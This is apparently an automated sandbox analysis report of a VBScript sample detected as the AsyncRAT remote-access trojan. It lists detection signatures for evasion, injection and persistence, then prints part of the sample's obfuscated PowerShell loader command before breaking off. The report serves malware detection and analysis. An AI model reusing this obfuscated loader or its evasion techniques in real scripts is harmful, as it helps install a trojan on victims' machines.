Windows Analysis Report
H#0813-186765.vbs
Overview
General Information
Detection
AsyncRAT
Score: 100 (range: 0 - 100)
Whitelisted: false
Confidence: 100%
Signatures
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected AsyncRAT
.NET source code contains potential unpacker
AI detected suspicious sample
Bypasses PowerShell execution policy
Creates a thread in another existing process (thread injection)
Loading BitLocker PowerShell Module
Sigma detected: Potential AMSI COM Server Hijacking
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses cmd line tools excessively to alter registry or file data
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 572 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\H#0813-186765.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
- powershell.exe (PID: 4844 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $var1 = $([char]([byte]0x20)+[char]([byte]0x5b)+[char]([byte]0x52)+[char]([byte]0x65)+[char]([byte]0x66)+[char]([byte]0x6c)+[char]([byte]0x65)+[char]([byte]0x63)+[char]([byte]0x74)+[char]([byte]0x69)+[char]([byte]0x6f)+[char]([byte]0x6e)+[char]([byte]0x2e)+[char]([byte]0x41)+[char]([byte]0x73)+[char]([byte]0x73)+[char]([byte]0x65)+[char]([byte]0x6d)+[char]([byte]0x62)+[char]([byte]0x6c)+[char]([byte]0x79)+[char]([byte]0x5d)+[char]([byte]0x3a)+[char]([byte]0x3a)+[char]([byte]0x6c)+[char]([byte]0x6f)+[char]([byte]0x61)+[char]([byte]0x64)+[char]([byte]0x77)+[char]([byte]0x69)+[char]([byte]0x74)+[char]([byte]0x68)+[char]([byte]0x50)+[char]([byte]0x61)+[char]([byte]0x72)+[char]([byte]0x74)+[char]([byte]0x69)+[char]([byte]0x61)+[char]([byte]0x6c)+[char]([byte]0x4e)+[char]([byte]0x61)+[char]([byte]0x6d)+[char]([byte]0x65)+[char]([byte]0x28)+[char]([byte]0x22)+[char]([byte]0x4d)+[char]([byte]0x69)+[char]([byte]0x63)+[char]([byte]0x72)+[char]([byte]0x6f)+[char]([byte]0x73)+[char]([byte]0x6f)+[char]([byte]0x66)+[char]([byte]0x74)+[char]([byte]0x2e)+[char]([byte]0x56)+[char]([byte]0x69)+[char]([byte]0x73)+[char]([byte]0x75)+[char]([byte]0x61)+[char]([byte]0x6c)+[char]([byte]0x42)+[char]([byte]0x61)+[char]([byte]0x73)+[char]([byte]0x69)+[char]([byte]0x63)+[char]([byte]0x22)+[char]([byte]0x29)+[char]([byte]0x20)+[char]([byte]0x7c)+[char]([byte]0x20)+[char]([byte]0x4f)+[char]([byte]0x75)+[char]([byte]0x74)+[char]([byte]0x2d)+[char]([byte]0x4e)+[char]([byte]0x75)+[char]([byte]0x6c)+[char]([byte]0x6c)+[char]([byte]0x20)+[char]([byte]0x3b)+[char]([byte]0x73)+[char]([byte]0x6c)+[char]([byte]0x65)+[char]([byte]0x65)+[char]([byte]0x70)+[char]([byte]0x20)+[char]([byte]0x2d)+[char]([byte]0x73)+[char]([byte]0x20)+[char]([byte]0x34)+[char]([byte]0x20)+[char]([byte]0x3b)+[char]([byte]0x20)+[char]([byte]0x24)+[char]([byte]0x76)+[char]([byte]0x61)+[char]([byte]0x72)+[char]([byte]0x20)+[char]([byte]0x3d)+[char]([byte]0x20)+[char]([byte]0x20)+[char]([byte]0x5b)+[char]([byte]0x4d)+[char]([byte]0x69)+[char]([byte]0x63)+[char]([byte]0x72)+[char]([byte]0x6f)+[char]([byte]0x73)+[char]([byte]0x6f)+[char]([byte]0x66)+[char]([byte]0x74)+[char]([byte]0x2e)+[char]([byte]0x56)+[char]([byte]0x69)+[char]([byte]0x73)+[char]([byte]0x75)+[char]([byte]0x61)+[char]([byte]0x6c)+[char]([byte]0x42)+[char]([byte]0x61)+[char]([byte]0x73)+[char]([byte]0x69)+[char]([byte]0x63)+[char]([byte]0x2e)+[char]([byte]0x49)+[char]